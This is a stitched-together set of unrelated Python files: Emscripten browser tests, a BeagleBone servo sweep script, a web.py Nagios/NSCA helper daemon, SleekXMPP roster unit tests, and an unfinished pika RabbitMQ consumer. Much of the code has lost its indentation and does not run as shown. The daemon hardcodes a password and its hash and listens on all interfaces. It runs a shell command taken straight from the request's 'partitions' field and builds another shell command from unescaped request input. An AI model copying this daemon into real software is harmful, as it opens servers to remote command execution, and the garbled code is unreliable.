def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the
    # browser that is launched will have that directory as its startup directory, and the browser will
    # not close as part of the test, pinning down the cwd on Windows and making it impossible to
    # delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
    # Verify that trying to pass an argument to the page without the `--` separator will
    # generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
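# A usage sketch (assumed invocation; the exact runner path can differ per checkout):
# these browser suites are normally driven through Emscripten's test runner, e.g.
#   python tests/runner.py browser.test_single_file_html
#   python tests/runner.py emrun
# with EMTEST_BROWSER optionally pointing at the browser command to use.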
|
servoTest_loop_thread.py
|
#from: http://www.toptechboy.com/tutorial/beaglebone-black-lesson-6-control-pwm-signals-on-gpio-pins-from-python/
import Adafruit_BBIO.PWM as PWM
from time import sleep
import threading
#import Adafruit_BBIO.GPIO as GPIO
#from Adafruit_BBIO.PWM import PWM
#GPIO.setup("P8_13", GPIO.OUT)
steps = 7
SERVO_1="P9_14"
SERVO_2="P9_16"
pwm_min = 5
pwm_max = 10
freq = 50 #Hz
start_duty = 0
PWM.start(SERVO_1,0,freq)
PWM.start(SERVO_2,0,freq)
angle = 0
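# With freq = 50 Hz, a 5-10% duty cycle corresponds to the usual 1-2 ms hobby-servo
# pulse, so duty = angle/36.0 + pwm_min maps 0-180 degrees onto pwm_min..pwm_max.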
def setServo_1(angle):
if angle < 0:
angle = 0
elif angle > 180:
angle = 180
duty = angle/36.0+ pwm_min
if duty > pwm_max:
duty = pwm_max
PWM.set_duty_cycle(SERVO_1, duty)
print "duty 1", duty
def setServo_2(angle):
if angle < 0:
angle = 0
elif angle > 180:
angle = 180
duty = angle/36.0+ pwm_min
if duty > pwm_max:
duty = pwm_max
PWM.set_duty_cycle(SERVO_2, duty)
print "duty 2", duty
def servoLoop_1():
    #Servo_1 = PWM.start(SERVO_1,start_duty,freq)
    # sweep servo 1 up to ~50 degrees and back down
    i = 0
    while i < 51:
        print "angle ",i
        setServo_1(i)
        sleep(1)
        i += steps
    while i > 0:
        print "angle ",i
        setServo_1(i)
        sleep(1)
        i -= steps
def servoLoop_2():
    #Servo_2 = PWM.start(SERVO_2,start_duty,freq)
    # sweep servo 2 up to ~50 degrees and back down
    i = 0
    while i < 50:
        print "angle ",i
        setServo_2(i)
        sleep(1)
        i += steps
    while i > 0:
        print "angle ",i
        setServo_2(i)
        sleep(1)
        i -= steps
if __name__=="__main__":
    # PWM.start(SERVO_1,start_duty,freq)
    # PWM.start(SERVO_2,start_duty,freq)
    #Servo_1 = PWM.start(SERVO_1,start_duty,freq)
    #Servo_2 = PWM.start(SERVO_2,start_duty,freq)
    #servoLoop_1()
    #servoLoop_2()
    # setServo_1(20)
    # setServo_2(20)
    '''
    Run both sweep loops in daemon worker threads; the main thread prints a
    heartbeat while they run, then waits for them and shuts the PWM outputs down.
    '''
    angle = 0
    s1 = threading.Thread(target=servoLoop_1)
    s1.setDaemon(True)
    s2 = threading.Thread(target=servoLoop_2)
    s2.setDaemon(True)
    s1.start()
    s2.start()
    for j in range(20):
        angle = j
        print "angle loop: ",angle
        sleep(1)
    s1.join()
    s2.join()
    PWM.stop(SERVO_1)
    PWM.stop(SERVO_2)
    PWM.cleanup()
|
nsca-helper-daemon.py
|
import os
import sys
import web
import simplejson
import utils
from __exceptions__ import formattedException
'''
Requires: web.py --> http://webpy.org/
'''
import threading
__version__ = '1.0.0'
import logging
from logging import handlers
__PROGNAME__ = os.path.splitext(os.path.basename(sys.argv[0]))[0]
LOG_FILENAME = os.sep.join([os.path.dirname(sys.argv[0]),'%s.log' % (__PROGNAME__)])
class MyTimedRotatingFileHandler(handlers.TimedRotatingFileHandler):
def __init__(self, filename, maxBytes=0, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
handlers.TimedRotatingFileHandler.__init__(self, filename=filename, when=when, interval=interval, backupCount=backupCount, encoding=encoding, delay=delay, utc=utc)
self.maxBytes = maxBytes
def shouldRollover(self, record):
response = handlers.TimedRotatingFileHandler.shouldRollover(self, record)
if (response == 0):
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
try:
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
except:
pass
return 0
return response
logger = logging.getLogger(__PROGNAME__)
handler = logging.FileHandler(LOG_FILENAME)
#handler = handlers.TimedRotatingFileHandler(LOG_FILENAME, when='d', interval=1, backupCount=30, encoding=None, delay=False, utc=False)
#handler = MyTimedRotatingFileHandler(LOG_FILENAME, maxBytes=1000000, when='d', backupCount=30)
#handler = handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=1000000, backupCount=30, encoding=None, delay=False)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
print 'Logging to "%s".' % (handler.baseFilename)
ch = logging.StreamHandler()
ch_format = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(ch_format)
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
logging.getLogger().setLevel(logging.DEBUG)
urls = (
'/', 'Index',
'/nsca/(.+)', 'NSCAHelper',
'/nsca', 'NSCAHelper',
'/setwindowsagentaddr', 'Nothing',
'/setwindowsagentaddr/', 'Nothing',
)
### Templates
render = web.template.render('templates', base='base')
web.template.Template.globals.update(dict(
datestr = web.datestr,
render = render
))
def notfound():
return web.notfound("Sorry, the page you were looking for was not found. This message may be seen whenever someone tries to issue a negative number as part of the REST URL Signature and this is just not allowed at this time.")
__index__ = '''
<html>
<head>
<title>(c). Copyright 2013, AT&T, All Rights Reserved.</title>
<style>
#menu {
width: 200px;
float: left;
}
</style>
</head>
<body>
<ul id="menu">
<li><a href="/">Home</a></li>
</ul>
<p><b>UNAUTHORIZED ACCESS</b></p>
</body>
</html>
'''
class Index:
def GET(self):
""" Show page """
s = '%s %s' % (__PROGNAME__,__version__)
return __index__
class Nothing:
def POST(self):
web.header('Content-Type', 'text/html')
return __index__
__username__ = 'nscahelper'
__password__ = utils.md5('peekab00')
class NSCAHelper:
def GET(self):
web.header('Content-Type', 'text/html')
return __index__
def POST(self,uri):
'''
/nsca/nagios/update/config
{ "oper":"login",
"username":"nscahelper",
"password":"103136174d231aabe1de8feaf9afc92f",
"target":"nagios.cfg",
"cfg":"remote1_nagios2",
"service1": { "use":"generic-service",
"host_name":"remote1",
"service_description":"DISK_1",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service2": { "use":"generic-service",
"host_name":"remote1",
"service_description":"DISK_2",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
}
}
/nsca/nagios/send/nsca
{ "oper":"login",
"username":"nscahelper",
"password":"103136174d231aabe1de8feaf9afc92f",
"send_nsca": "localhost\\tDummy Service\\t2\\tlocalhost Mon Dec 23 22:03:50 UTC 2013",
"cfg":"/etc/send_nsca.cfg"
}
/nsca/nagios/create/config
{"oper": "login",
"username": "nscahelper",
"password": "103136174d231aabe1de8feaf9afc92f",
"target": "nagios.cfg",
"cfg": "remote2_nagios2",
"partitions": "awk '{print $4}' /proc/partitions | sed -e '/name/d' -e '/^$/d' -e '/[1-9]/!d'",
"host1": {
"use": "generic-host",
"host_name": "remote1",
"alias": "remote1",
"address": "0.0.0.0"
},
"command1": {
"command_name": "dummy_command2",
"command_line": "echo \"0\""
},
"service1": { "use":"generic-service",
"host_name":"remote1",
"service_description":"CPULoad",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service2": { "use":"generic-service",
"host_name":"remote1",
"service_description":"CurrentUsers",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service3": { "use":"generic-service",
"host_name":"remote1",
"service_description":"PING",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service4": { "use":"generic-service",
"host_name":"remote1",
"service_description":"SSH",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service5": { "use":"generic-service",
"host_name":"remote1",
"service_description":"TotalProcesses",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
},
"service6": { "use":"generic-service",
"host_name":"remote1",
"service_description":"ZombieProcesses",
"active_checks_enabled":"0",
"passive_checks_enabled":"1",
"check_command":"dummy_command2"
}
}
'''
logger.info('1. uri=%s' % (uri))
web.header('Content-Type', 'application/json')
logger.info('2. web.data()=%s' % (web.data()))
d = {}
status = ''
try:
payload = utils.SmartObject(simplejson.loads(web.data()))
except Exception, ex:
payload = utils.SmartObject()
content = formattedException(details=ex)
logger.exception(content)
d['exception1'] = content
try:
nagios_update_config = 'nagios/update/config'
nagios_create_config = 'nagios/create/config'
if (uri in [nagios_update_config,nagios_create_config]):
logger.info('3. payload.oper=%s' % (payload.oper))
if (payload.oper == 'login'):
logger.info('4. payload.username=%s' % (payload.username))
logger.info('5. payload.password=%s' % (payload.password))
if ( (payload.username == __username__) and (payload.password == __password__) ):
logger.info('6. payload.cfg=%s [%s]' % (payload.cfg,(payload.cfg is not None)))
if (payload.cfg is not None):
logger.info('7. utils.isUsingLinux=%s' % (utils.isUsingLinux))
nagios_cfg = str(payload.target) if (payload.target) else 'nagios.cfg'
if (utils.isUsingLinux):
if (nagios_cfg):
if (payload.cfg):
__cfg__ = None
__nagios_cfg__ = None
for top,dirs,files in utils.walk('/usr'):
#if (top.find('/usr/lib') > -1):
#logger.info('8. top=%s' % (top))
if (nagios_cfg in files):
#logger.debug('9. top=%s' % (top))
__nagios_cfg__ = os.sep.join([top,nagios_cfg])
logger.debug('10. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
for top,dirs,files in utils.walk('/etc'):
#logger.info('11. top=%s' % (top))
if (top.find('nagios') > -1):
#logger.debug('12. top=%s' % (top))
if (nagios_cfg in files):
logger.debug('13. top=%s' % (top))
__nagios_cfg__ = os.sep.join([top,nagios_cfg])
logger.debug('14. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
if (__nagios_cfg__) and (os.path.exists(__nagios_cfg__)):
logger.debug('20. __nagios_cfg__=%s [%s]' % (__nagios_cfg__,os.path.exists(__nagios_cfg__)))
for top,dirs,files in utils.walk(os.path.dirname(__nagios_cfg__)):
logger.debug('21. top=%s' % (top))
target_cfg = payload.cfg+'.cfg'
for f in files:
#logger.debug('22 f (%s) == target (%s) [%s]' % (f,target_cfg,(f == target_cfg)))
if (f == target_cfg):
__cfg__ = os.sep.join([top,f])
break
logger.debug('23. __cfg__=%s' % (__cfg__))
if (uri in [nagios_create_config]) and (__cfg__ is None):
__cfgd__ = os.sep.join([os.path.dirname(__nagios_cfg__),'conf.d'])
if (os.path.exists(__cfgd__)):
__cfg__ = __cfgd__
__cfg__ = os.sep.join([__cfg__,target_cfg])
logger.debug('24. __cfg__=%s' % (__cfg__))
logger.debug('25. __cfg__=%s [%s]' % (__cfg__,os.path.exists(__cfg__) if (__cfg__) else None))
if (payload.partitions):
logger.info('26. payload.partitions=%s' % (payload.partitions))
results = utils.shellexecute(payload.partitions)
logger.info('26.1 results=%s' % (results))
payload.partition_names = [str(r).strip() for r in results] if (utils.isList(results)) else results
logger.info('26.2 payload.partition_names=%s' % (payload.partition_names))
if (__cfg__) and (os.path.exists(__cfg__)) and (uri in [nagios_update_config]):
logger.debug('27. handle_disk_services !!!')
status = utils.handle_disk_services(__cfg__, payload,logger)
d['status'] = status
logger.debug('28. status=%s' % (status))
elif (__cfg__) and (uri in [nagios_create_config]):
logger.debug('29. handle_services !!!')
status = utils.handle_services(__cfg__, payload,logger)
d['status'] = status
logger.debug('30. status=%s' % (status))
else:
logger.exception('WARNING: Cannot handle config file of "%s".' % (__cfg__))
break
else:
logger.exception('WARNING: Cannot determine location of "%s".' % (nagios_cfg))
else:
logger.exception('WARNING: Cannot use or determine the valud of cfg which is "%s".' % (payload.cfg))
else:
logger.exception('WARNING: Cannot use nagios.cfg reference of "%s".' % (nagios_cfg))
else:
logger.exception('WARNING: Cannot run this program in any OS other than Linux, sorry.')
elif (uri == 'nagios/send/nsca'):
logger.info('3. payload.oper=%s' % (payload.oper))
if (payload.oper == 'login'):
logger.info('4. payload.username=%s' % (payload.username))
logger.info('5. payload.password=%s' % (payload.password))
if ( (payload.username == __username__) and (payload.password == __password__) ):
logger.info('6. payload.cfg=%s [%s]' % (payload.cfg,(payload.cfg is not None)))
if (payload.cfg is not None):
logger.info('7. utils.isUsingLinux=%s' % (utils.isUsingLinux))
send_nsca_cfg = str(payload.cfg)
if (utils.isUsingLinux):
if (send_nsca_cfg) and (os.path.exists(send_nsca_cfg)):
logger.info('8. send_nsca_cfg=%s' % (send_nsca_cfg))
results = utils.shellexecute('which send_nsca')
logger.info('9. results=%s' % (results))
__send_nsca__ = results[0].split('\n')[0] if (utils.isList(results)) else results.split('\n')[0]
logger.info('10. __send_nsca__=%s' % (__send_nsca__))
if (__send_nsca__) and (os.path.exists(__send_nsca__)):
logger.info('11. payload.send_nsca=%s' % (payload.send_nsca))
__cmd__ = 'printf "%%s\\n" "%s" | %s -H 127.0.0.1 -p 5667 -c %s' % (payload.send_nsca.replace('\\t','\t'),__send_nsca__,send_nsca_cfg)
logger.info('12. __cmd__=%s' % (__cmd__))
results = utils.shellexecute(__cmd__)
if (utils.isList(results)):
', '.join(results)
logger.info('13. results=%s' % (results))
d['status'] = results
else:
logger.exception('WARNING: Cannot determine location of send_nsca command from "%s".' % (__send_nsca__))
else:
logger.exception('WARNING: Cannot determine location of "%s".' % (send_nsca_cfg))
except Exception, ex:
content = formattedException(details=ex)
logger.exception(content)
d['exception2'] = content
return simplejson.dumps(d)
app = web.application(urls, globals())
app.notfound = notfound
if __name__ == '__main__':
'''
python nsca-helper-daemon.py
'''
import re
__re__ = re.compile(r"(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):([0-9]{1,5})", re.MULTILINE)
has_binding = any([__re__.match(arg) for arg in sys.argv])
if (not has_binding):
sys.argv.append('0.0.0.0:15667')
def __init__():
logger.info('%s %s started !!!' % (__PROGNAME__,__version__))
app.run()
t = threading.Thread(target=__init__)
t.daemon = False
t.start()
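# A hypothetical client sketch (commented out; endpoint, port and credentials taken
# from the defaults above) that exercises the /nsca/nagios/send/nsca operation
# documented in NSCAHelper.POST:
#
#   import simplejson, urllib2
#   payload = {"oper": "login",
#              "username": "nscahelper",
#              "password": "103136174d231aabe1de8feaf9afc92f",
#              "send_nsca": "localhost\\tDummy Service\\t2\\tlocalhost OK",
#              "cfg": "/etc/send_nsca.cfg"}
#   req = urllib2.Request("http://127.0.0.1:15667/nsca/nagios/send/nsca",
#                         simplejson.dumps(payload),
#                         {"Content-Type": "application/json"})
#   print urllib2.urlopen(req).read()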
|
test_stream_roster.py
|
# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
import unittest
from sleekxmpp.exceptions import IqTimeout
from sleekxmpp.test import SleekTest
import time
import threading
class TestStreamRoster(SleekTest):
"""
Test handling roster updates.
"""
def tearDown(self):
self.stream_close()
def testGetRoster(self):
"""Test handling roster requests."""
self.stream_start(mode='client', jid='tester@localhost')
roster_updates = []
self.xmpp.add_event_handler('roster_update', roster_updates.append)
# Since get_roster blocks, we need to run it in a thread.
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq to='tester@localhost' type="result" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="from"
ask="subscribe">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
# Wait for get_roster to return.
t.join()
# Give the event queue time to process.
time.sleep(.1)
self.check_roster('tester@localhost', 'user@localhost',
name='User',
subscription='from',
afrom=True,
pending_out=True,
groups=['Friends', 'Examples'])
self.failUnless(len(roster_updates) == 1,
"Wrong number of roster_update events fired: %s (should be 1)" % len(roster_updates))
def testRosterSet(self):
"""Test handling pushed roster updates."""
self.stream_start(mode='client')
events = []
def roster_update(e):
events.append('roster_update')
self.xmpp.add_event_handler('roster_update', roster_update)
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.check_roster('tester@localhost', 'user@localhost',
name='User',
subscription='both',
groups=['Friends', 'Examples'])
# Give the event queue time to process.
time.sleep(.1)
self.failUnless('roster_update' in events,
"Roster updated event not triggered: %s" % events)
def testRosterPushRemove(self):
"""Test handling roster item removal updates."""
self.stream_start(mode='client')
events = []
# Add roster item
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.assertTrue('user@localhost' in self.xmpp.client_roster)
# Receive item remove push
self.recv("""
<iq to='tester@localhost' type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
subscription="remove">
</item>
</query>
</iq>
""")
self.send("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.assertTrue('user@localhost' not in self.xmpp.client_roster)
def testUnauthorizedRosterPush(self):
"""Test rejecting a roster push from an unauthorized source."""
self.stream_start()
self.recv("""
<iq to='tester@localhost' from="malicious_user@localhost"
type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
self.send("""
<iq to="malicious_user@localhost" type="error" id="1">
<error type="cancel" code="503">
<service-unavailable xmlns="urn:ietf:params:xml:ns:xmpp-stanzas" />
</error>
</iq>
""")
def testRosterTimeout(self):
"""Test handling a timed out roster request."""
self.stream_start()
def do_test():
self.xmpp.get_roster(timeout=0)
time.sleep(.1)
self.assertRaises(IqTimeout, do_test)
def testRosterCallback(self):
"""Test handling a roster request callback."""
self.stream_start()
events = []
def roster_callback(iq):
events.append('roster_callback')
# Since get_roster blocks, we need to run it in a thread.
t = threading.Thread(name='get_roster',
target=self.xmpp.get_roster,
kwargs={str('block'): False,
str('callback'): roster_callback})
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq type="result" id="1">
<query xmlns="jabber:iq:roster">
<item jid="user@localhost"
name="User"
subscription="both">
<group>Friends</group>
<group>Examples</group>
</item>
</query>
</iq>
""")
# Wait for get_roster to return.
t.join()
# Give the event queue time to process.
time.sleep(.1)
        self.failUnless(events == ['roster_callback'],
                        "Roster callback was not triggered: %s." % events)
def testRosterUnicode(self):
"""Test that JIDs with Unicode values are handled properly."""
self.stream_start(plugins=[])
self.recv("""
<iq to="tester@localhost" type="set" id="1">
<query xmlns="jabber:iq:roster">
<item jid="andré@foo" subscription="both">
<group>Unicode</group>
</item>
</query>
</iq>
""")
# Give the event queue time to process.
time.sleep(.1)
self.check_roster('tester@localhost', 'andré@foo',
subscription='both',
groups=['Unicode'])
jids = list(self.xmpp.client_roster.keys())
self.failUnless(jids == ['andré@foo'],
"Too many roster entries found: %s" % jids)
self.recv("""
<presence to="tester@localhost" from="andré@foo/bar">
<show>away</show>
<status>Testing</status>
</presence>
""")
# Give the event queue time to process.
time.sleep(.1)
result = self.xmpp.client_roster['andré@foo'].resources
expected = {'bar': {'status':'Testing',
'show':'away',
'priority':0}}
self.failUnless(result == expected,
"Unexpected roster values: %s" % result)
def testSendLastPresence(self):
"""Test that sending the last presence works."""
self.stream_start(plugins=[])
self.xmpp.send_presence(pshow='dnd')
self.xmpp.auto_authorize = True
self.xmpp.auto_subscribe = True
self.send("""
<presence>
<show>dnd</show>
</presence>
""")
self.recv("""
<presence from="user@localhost"
to="tester@localhost"
type="subscribe" />
""")
self.send("""
<presence to="user@localhost"
type="subscribed" />
""")
self.send("""
<presence to="user@localhost">
<show>dnd</show>
</presence>
""")
def testUnsupportedRosterVer(self):
"""Test working with a server without roster versioning."""
self.stream_start()
self.assertTrue('rosterver' not in self.xmpp.features)
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
def testBootstrapRosterVer(self):
"""Test bootstrapping with roster versioning."""
self.stream_start()
self.xmpp.features.add('rosterver')
self.xmpp.client_roster.version = ''
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" ver="" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
def testExistingRosterVer(self):
"""Test using a stored roster version."""
self.stream_start()
self.xmpp.features.add('rosterver')
self.xmpp.client_roster.version = '42'
t = threading.Thread(name='get_roster', target=self.xmpp.get_roster)
t.start()
self.send("""
<iq type="get" id="1">
<query xmlns="jabber:iq:roster" ver="42" />
</iq>
""")
self.recv("""
<iq to="tester@localhost" type="result" id="1" />
""")
t.join()
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamRoster)
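# A minimal sketch for running the suite above directly; SleekXMPP's own test driver
# normally collects `suite`, so this block is just a convenience.
if __name__ == '__main__':
    unittest.TextTestRunner(verbosity=2).run(suite)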
|
pika_consumer.py
|
# -*- coding: utf-8 -*-
import logging
import pika
from flask import Flask
import time
import threading
import atexit
LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '
'-35s %(lineno) -5d: %(message)s')
LOGGER = logging.getLogger(__name__)
class ExampleConsumer(object):
"""This is an example consumer that will handle unexpected interactions
with RabbitMQ such as channel and connection closures.
If RabbitMQ closes the connection, it will reopen it. You should
look at the output, as there are limited reasons why the connection may
be closed, which usually are tied to permission related issues or
socket timeouts.
If the channel is closed, it will indicate a problem with one of the
commands that were issued and that should surface in the output as well.
"""
EXCHANGE = 'message'
EXCHANGE_TYPE = 'topic'
QUEUE = 'text'
ROUTING_KEY = 'example.text'
def __init__(self, amqp_url):
"""Create a new instance of the consumer class, passing in the AMQP
URL used to connect to RabbitMQ.
:param str amqp_url: The AMQP url to connect with
"""
self._connection = None
self._channel = None
self._closing = False
self._consumer_tag = None
self._url = amqp_url
def connect(self):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
LOGGER.info('Connecting to %s', self._url)
return pika.SelectConnection(pika.URLParameters(self._url),
self.on_connection_open,
stop_ioloop_on_close=False)
def on_connection_open(self, unused_connection):
"""This method is called by pika once the connection to RabbitMQ has
been established. It passes the handle to the connection object in
case we need it, but in this case, we'll just mark it unused.
:type unused_connection: pika.SelectConnection
"""
LOGGER.info('Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def add_on_connection_close_callback(self):
"""This method adds an on close callback that will be invoked by pika
when RabbitMQ closes the connection to the publisher unexpectedly.
"""
LOGGER.info('Adding connection close callback')
self._connection.add_on_close_callback(self.on_connection_closed)
def on_connection_closed(self, connection, reply_code, reply_text):
"""This method is invoked by pika when the connection to RabbitMQ is
closed unexpectedly. Since it is unexpected, we will reconnect to
RabbitMQ if it disconnects.
:param pika.connection.Connection connection: The closed connection obj
:param int reply_code: The server provided reply_code if given
:param str reply_text: The server provided reply_text if given
"""
self._channel = None
if self._closing:
self._connection.ioloop.stop()
else:
LOGGER.warning('Connection closed, reopening in 5 seconds: (%s) %s',
reply_code, reply_text)
self._connection.add_timeout(5, self.reconnect)
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is
closed. See the on_connection_closed method.
"""
# This is the old connection IOLoop instance, stop its ioloop
self._connection.ioloop.stop()
if not self._closing:
# Create a new connection
self._connection = self.connect()
# There is now a new connection, needs a new ioloop to run
self._connection.ioloop.start()
def open_channel(self):
"""Open a new channel with RabbitMQ by issuing the Channel.Open RPC
command. When RabbitMQ responds that the channel is open, the
on_channel_open callback will be invoked by pika.
"""
LOGGER.info('Creating a new channel')
self._connection.channel(on_open_callback=self.on_channel_open)
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened.
The channel object is passed in so we can make use of it.
Since the channel is now open, we'll declare the exchange to use.
:param pika.channel.Channel channel: The channel object
"""
LOGGER.info('Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_exchange(self.EXCHANGE)
def add_on_channel_close_callback(self):
"""This method tells pika to call the on_channel_closed method if
RabbitMQ unexpectedly closes the channel.
"""
LOGGER.info('Adding channel close callback')
self._channel.add_on_close_callback(self.on_channel_closed)
def on_channel_closed(self, channel, reply_code, reply_text):
